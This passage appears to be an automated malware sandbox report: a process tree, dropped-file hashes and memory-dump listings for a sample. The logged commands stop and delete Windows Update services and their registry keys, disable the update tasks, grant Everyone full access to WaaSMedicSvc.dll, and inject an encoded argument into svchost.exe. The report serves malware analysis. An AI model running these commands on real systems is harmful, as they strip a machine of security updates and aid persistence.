Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "ayfzchqlcjzzno"4⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe hhmzomdryxklm1 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRSWr9mZW0WjQ8Zp6uvmLE6u5mJa6blLxbhLUBAH2hxKbhKEsyAtsV/R69zSzs3rP9kwrKtV5rbpmU/ciKPfPbhE9OKMMZXsI4UuRWZka8gS1s3HImYphWDV4wtqbeoHFj9g+eZNUoxfSBEn9L8w689dicSe5gi9g1CuCFLqyc7rwP/qjv/3JltIuH5LITKSCk7NXUnWeSDcKY+NEgVfPhJqoLEg0aeDg0KzxJrSUBDIJsbJWIc9iXONDbVMTVT325hS49GeGAI3OCMHKRR3rdOlsV6M9LUsKiFtUKe023Fiqki/2NFI17HEJ11UF+t6f3f98YUZokpWGVfv/F+VZIliwJaLVyzmm8cmJbvj/Kk9fw4aMKco/zTvKVFpN7WHBE5ihOAIdgLEtFFOECZ0VkdHbSg7zj8LXWP3XBDgZmT/PqsiIA0H3OwZNBjcY4rgjXQuml3y2wHeGb80pVVWBuMCIL8sCKDGpDbxiGDcBPcXfVWLdW+mS2VMIb3O/HlHhTYbdCuIHWH/bwUTs0vfQ83nR1mapBl3HhjShQnY40eZw0N1hMUMfCNjyNzWVgfBMhy9MwGaqnFJcQDpiYiVz61SrdLFCtpEnS3/kpJJXUzUBm0N2+JFiygLQGxw1SnSpP2EyTmdeaAN2uFWIS+BKCPJnp+Urs4ZIl3L86i6Tua4xkWIuaHTvQcBBqfq2BUHq/tLhHwx6yCrF/kfnl/5iXfLuCspUzlw6ZMz1cm2MDpBcOg1/gqzqrt+nyVDaTWBNnlqQtGRUYtUgvt5UXluuo835dbfAbWdkMMKIb7n2tZu2O5jsprX3nRnflrXNwa4aGTIlireC/ZpMF870p7vGDEFpva1T0Rd09ATLL1v8gEbuv8MViLO6cBi+L9jUR0yZfcdT7y8lHnRy/+8C79u/c9DjZfyQB8NJv62KZdxCwBzSeLR5MMSp11Y2skr66+YEXG2FRRWrXAlH2bZXv98TaPSbt0i43nk4Yz7s+ytCPFUNIeIoxV9ce2xdOpHqqFCtwT8eJ9EaMxFCuVWhNc9ECcQ2wJtJ2BTuhX2x4mJKeaQTai1sy8DVQYd52treWJZeQG+84IKsCqBOo4TZLL7GKMsSj+J3fMBL82oHYCVo/XwBH9fjo36EWBjibeA1qOBj3n8/hOcGirQ/WjUG5965/cSYWzjatv0njtxER7lnH9HMnXMsHXUpgPeDkQYQe8tWGkKJfOjKWvOKULJTdqwcjKrySMCAnwM23+lrIvjgkHDSFXzrE4bsgtfQQLgMvxtEV0uEXKS5q7oSkWyt2f8078oXmh5OhNyLJn6XCoGx/NQGZ8UxzjcKczeCotM0TNeWj+SABRXgkf1VUKrXmJ0CAlPIjguo+q4co87MqHySF8+C6J7s6n/f1l++/reoGTPOhnw7iNjxqQsdhFqi8WdxxhNztJR1CeWprsRqngRs4eZ0B2KyfMQDOnyRkBthFTsKUv8+JSQD5ORke/9r2kNBdlHH3NamvS16q1YsdXFYsvFCMrBnbCTsCu+tasasTw82VpHrmPvBHdUFcaccuCCLHfZL28RuT4oBeO3lR+nHIbW9b5laMXY0Dn9kqMFd7Vj66+/jyFUG1pVWHJgudOaJbM3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\services.exeFilesize
7.6MB
MD595104aa61ed30687c13e5c644d5722f3
SHA1f9788f808044d448f73203d93da0021cefb781ff
SHA256a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
SHA51299dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
-
C:\Program Files\Windows\services.exeFilesize
7.6MB
MD595104aa61ed30687c13e5c644d5722f3
SHA1f9788f808044d448f73203d93da0021cefb781ff
SHA256a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
SHA51299dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD584f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
memory/68-381-0x0000000000000000-mapping.dmp
-
memory/200-217-0x0000000000000000-mapping.dmp
-
memory/200-233-0x000002D476CA0000-0x000002D476CBC000-memory.dmpFilesize
112KB
-
memory/200-239-0x000002D477900000-0x000002D4779B9000-memory.dmpFilesize
740KB
-
memory/200-273-0x000002D476CC0000-0x000002D476CCA000-memory.dmpFilesize
40KB
-
memory/304-175-0x0000000000000000-mapping.dmp
-
memory/316-176-0x0000000000000000-mapping.dmp
-
memory/320-216-0x0000000000000000-mapping.dmp
-
memory/412-190-0x0000000000000000-mapping.dmp
-
memory/412-386-0x0000000000000000-mapping.dmp
-
memory/428-180-0x0000000000000000-mapping.dmp
-
memory/524-189-0x0000000000000000-mapping.dmp
-
memory/796-374-0x0000000000000000-mapping.dmp
-
memory/836-384-0x0000000000000000-mapping.dmp
-
memory/872-382-0x0000000000000000-mapping.dmp
-
memory/1172-392-0x0000000000000000-mapping.dmp
-
memory/1376-401-0x00000202326A0000-0x00000202326C0000-memory.dmpFilesize
128KB
-
memory/1376-398-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/1376-415-0x00000202327E0000-0x0000020232800000-memory.dmpFilesize
128KB
-
memory/1376-405-0x0000020233340000-0x0000020233380000-memory.dmpFilesize
256KB
-
memory/1376-403-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/1376-396-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/1376-397-0x000000014036DB84-mapping.dmp
-
memory/1376-400-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/1412-194-0x0000000000000000-mapping.dmp
-
memory/1424-365-0x0000000000000000-mapping.dmp
-
memory/1632-184-0x0000000000000000-mapping.dmp
-
memory/1716-178-0x0000000000000000-mapping.dmp
-
memory/1724-389-0x0000000000000000-mapping.dmp
-
memory/1800-363-0x0000000000000000-mapping.dmp
-
memory/1812-133-0x0000000000000000-mapping.dmp
-
memory/1876-373-0x000001D49A3E0000-0x000001D49A3E6000-memory.dmpFilesize
24KB
-
memory/1876-383-0x000001D4B2DC0000-0x000001D4B2DD2000-memory.dmpFilesize
72KB
-
memory/1928-393-0x0000000000000000-mapping.dmp
-
memory/1988-387-0x0000000000000000-mapping.dmp
-
memory/2072-197-0x0000000000000000-mapping.dmp
-
memory/2076-196-0x0000000000000000-mapping.dmp
-
memory/2088-174-0x0000000000000000-mapping.dmp
-
memory/2100-369-0x0000000000000000-mapping.dmp
-
memory/2188-204-0x0000000000400000-0x0000000001119000-memory.dmpFilesize
13.1MB
-
memory/2200-182-0x0000000000000000-mapping.dmp
-
memory/2244-411-0x000001FB6D0E0000-0x000001FB6D0E6000-memory.dmpFilesize
24KB
-
memory/2244-414-0x000001FB6CD70000-0x000001FB6CD77000-memory.dmpFilesize
28KB
-
memory/2252-188-0x0000000000000000-mapping.dmp
-
memory/2308-177-0x0000000000000000-mapping.dmp
-
memory/2492-201-0x0000000000000000-mapping.dmp
-
memory/2512-195-0x0000000000000000-mapping.dmp
-
memory/2524-199-0x0000000000000000-mapping.dmp
-
memory/2536-366-0x0000000000000000-mapping.dmp
-
memory/2568-395-0x0000000000000000-mapping.dmp
-
memory/2568-198-0x0000000000000000-mapping.dmp
-
memory/2708-173-0x0000000000000000-mapping.dmp
-
memory/2756-367-0x0000000000000000-mapping.dmp
-
memory/2772-181-0x0000000000000000-mapping.dmp
-
memory/2828-179-0x0000000000000000-mapping.dmp
-
memory/3132-187-0x0000000000000000-mapping.dmp
-
memory/3168-191-0x0000000000000000-mapping.dmp
-
memory/3320-388-0x0000000000000000-mapping.dmp
-
memory/3324-372-0x0000000000000000-mapping.dmp
-
memory/3336-370-0x0000000000000000-mapping.dmp
-
memory/3528-368-0x0000000000000000-mapping.dmp
-
memory/3544-380-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/3544-375-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/3544-376-0x0000000000401BEA-mapping.dmp
-
memory/3672-390-0x0000000000000000-mapping.dmp
-
memory/3732-192-0x0000000000000000-mapping.dmp
-
memory/3756-185-0x0000000000000000-mapping.dmp
-
memory/3768-193-0x0000000000000000-mapping.dmp
-
memory/3780-134-0x0000000000000000-mapping.dmp
-
memory/3780-139-0x00000210F0540000-0x00000210F0562000-memory.dmpFilesize
136KB
-
memory/3780-143-0x00000210F1030000-0x00000210F10A6000-memory.dmpFilesize
472KB
-
memory/3876-371-0x0000000000000000-mapping.dmp
-
memory/3900-183-0x0000000000000000-mapping.dmp
-
memory/3904-119-0x0000000000400000-0x0000000001119000-memory.dmpFilesize
13.1MB
-
memory/3908-186-0x0000000000000000-mapping.dmp
-
memory/3924-126-0x0000019BA29A0000-0x0000019BA2DBC000-memory.dmpFilesize
4.1MB
-
memory/3924-121-0x0000019B87920000-0x0000019B87D3C000-memory.dmpFilesize
4.1MB
-
memory/4036-391-0x0000000000000000-mapping.dmp
-
memory/4052-364-0x0000000000000000-mapping.dmp
-
memory/4056-394-0x0000000000000000-mapping.dmp